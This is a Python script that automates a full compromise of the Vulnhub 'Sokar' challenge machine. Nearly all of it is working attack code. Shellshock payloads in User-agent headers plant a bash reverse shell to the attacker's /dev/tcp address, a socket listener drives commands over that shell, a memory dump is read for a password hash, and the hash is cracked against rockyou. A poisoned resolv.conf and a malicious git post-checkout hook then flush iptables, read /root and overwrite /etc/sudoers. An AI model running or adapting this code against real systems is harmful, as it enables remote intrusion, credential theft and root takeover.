#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import print_function from subprocess import call from optparse import OptionParser import socket, re, sys, urllib2, time, os, crypt print("\n==============================================================================================="); print("\t Sokar Auto Pwner"); print("\tAuthor : teh3ck") print("\tTwitter: https://twitter.com/teh_h3ck") print("\tEmail : teh3ck@gmail.com") print("\tBlog : https://vagmour.eu") print("\tOnly dependency: dnsmasq") print("\tTested on Debian(Kali)/Ubuntu") print("\tThanks @rasta_mouse and @Vulnhub for providing such challenges!") print("===============================================================================================\n\n"); port = 591 def check_sokar(address, port): #checking if the sokar ip is correct s = socket.socket() print("[+] Attempting to connect to " + address + " on port " + str(port)) try: s.connect((address, port)) return True except socket.error, e: return False def shell_sokar(URL,address,localip): # spawning a shell via shellshock bug print("[+] Shellshocking on " + URL + " ...") opener=urllib2.build_opener() opener1=urllib2.build_opener() opener.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e "/bin/bash -i >& /dev/tcp/'+localip+'/51242 0>&1" > /home/bynarr/iostat')] opener1.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/chmod +x /home/bynarr/iostat')] try: print("[+] Writing payload to iostat file...") response=opener.open(URL) print("[+] Giving executing permissions to iostat file...") response1=opener1.open(URL) except Exception as e: print(e) def bynarr(): # runnning the lime(memory dump) program s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", 51242)) s.listen(5) print("[+] Listening on port 51242... ") (client, (ip, port)) = s.accept() print("[+] Reverse connection succeeded from : ", ip) print("[+] Spawning a tty...") command = "python -c 'import pty; pty.spawn(" + "\"/bin/sh\")'\n" client.send(command.encode()) time.sleep(1) print("[+] Creating file that contains the lime answer...") command = "echo 'add' > /tmp/add\n" client.send(command.encode()) time.sleep(1) print("[+] Doing memory dump...") command = "sudo /home/bynarr/./lime < /tmp/add\n" client.send(command.encode()) time.sleep(4) client.close() s.close() def forensics(URL): #extracting the hash from memory dump opener=urllib2.build_opener() opener.addheaders=[('User-agent', '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /tmp/ram')] try: response=opener.open(URL) for line in response.readlines(): if "apophis:$6$" in line: print("[+] Found apophis hash in memory dump") #with open('apophis.txt', 'w') as f: # print(line, file=f) return line except Exception as e: print(e) def testPass(cryptPass,wordlist): # cracking the apophis password salt = cryptPass[0:11] dictFile = open(wordlist,'r') for word in dictFile.readlines(): word = word.strip('\n') cryptword = crypt.crypt(word,salt) sys.stdout.write("\r[+] Hash value: " + cryptword) sys.stdout.flush() if (cryptword == cryptPass) : print("\n[+] Found password: "+word) return word print("[-] Password not found.\n") return def crack(hash, wordlist): # cracking the apophis password #passw = open(apophis.txt) if ":" in hash: cryptPass = hash.split(':')[1].strip(' ') print("[+] Cracking password for: apophis") cracked = testPass(cryptPass,wordlist) return cracked def dnmasq(local): # host machine as sokar-dev name resolution with open('/etc/hosts', 'r+') as f: if 'sokar-dev' not in f.read(): print(local + "\t" + "sokar-dev", file=f) print("[+] sokar-dev added in /etc/hosts file") else: print("[+] sokar-dev already in /etc/hosts file") os.system("killall dnsmasq; dnsmasq") def git_exploit(localip): # r00t payload preparation in host with open('/etc/ssh/sshd_config', 'r+') as f: if localip not in f.read(): print("ListenAddress" + "\t" + localip, file=f) print("[+] ListenAddress added in /etc/ssh/sshd_config file") else: print("[+] ListenAddress already in /etc/ssh/sshd_config file") print("[+] Generating the r00t payload locally...") os.system("""mkdir -p /root/secret-project/.Git/hooks/; git init /root/secret-project/; echo 'service sshd start\niptables -F\ncat /root/*\necho "apophis ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers' > /root/secret-project/.Git/hooks/post-checkout; cd /root/secret-project/; git add .; git commit -m 'pwned' -q; service ssh start""") def exploit(localip,sshpasswd, cracked): # r00t exploit s= socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", 51242)) s.listen(5) print("[+] Listening on port 51242... ") (client, (ip, port)) = s.accept() print("[+] Reverse connection succeeded from : ", ip) print("[+] Spawning a tty...") command = "python -c 'import pty; pty.spawn(" + "\"/bin/sh\")'\n" client.send(command.encode()) time.sleep(1) print("[+] Getting interactive shell...") command = "su apophis\n" client.send(command.encode()) client.recv(1024) time.sleep(.5) print("[+] Logging in as apophis...") command = cracked + "\n" client.send(command.encode()) client.recv(1024) time.sleep(.5) command = "rm -rf /mnt/secret-project\n" #in case it's already created in server client.send(command.encode()) client.recv(1024) time.sleep(.5) command = "echo 'Y' > /tmp/yes\n" client.send(command.encode()) time.sleep(.5) print("[+] Adding nameserver to the /etc/resolv.conf...") resolv = "nameserver " + localip command = "echo " + resolv + " > /etc/resolv.conf\n" client.send(command.encode()) client.recv(1024) time.sleep(.5) command = "~/./build < /tmp/yes\n" client.send(command.encode()) client.recv(1024) time.sleep(3) command = "YES\n" #capitals to not run the yes program client.send(command.encode()) time.sleep(3) client.recv(1024) command = sshpasswd + "\r\r" client.send(command.encode()) time.sleep(1) print(client.recv(4096)) client.close() s.close() def clean(): os.system("rm -rf /root/secret-project") if __name__ == '__main__': parser = OptionParser(description="Sokar Auto Pwner by teh3ck") parser.add_option("-a", "--address", dest="address", help="Sokar ip address", metavar="ADDRESS") parser.add_option("-l", "--localip", dest="localip", help="Local ip address", metavar="LOCAL") parser.add_option("-w", "--wordlist", dest="wordlist", default="/usr/share/wordlists/rockyou.txt", help="Path for wordlist file", metavar="WORDLIST") parser.add_option("-p", "--password", dest="sshpasswd", help="Give your local root ssh pass", metavar="SSHPASS") (options, args) = parser.parse_args() if (options.address == None or options.localip == None or options.sshpasswd == None): parser.print_help() exit else: URL="http://"+str(options.address)+":591/cgi-bin/cat" check = check_sokar(options.address, port) if check == True: print("[+] Attacking Sokar") shell_sokar(URL,options.address,options.localip) bynarr() hash = forensics(URL) cracked = crack(hash, options.wordlist) dnmasq(options.localip) git_exploit(options.localip) exploit(options.localip,options.sshpasswd, cracked) check = check_sokar(options.address, 22) print("[+] Removing secret-project directory from your system...") clean() if check == True: print("[+] ssh apophis@" + options.address) print("[+] Password: overdrive") print("[+] $sudo su") print("[+] W00T") else: print("That ip isn't sokar") sys.exit(not check)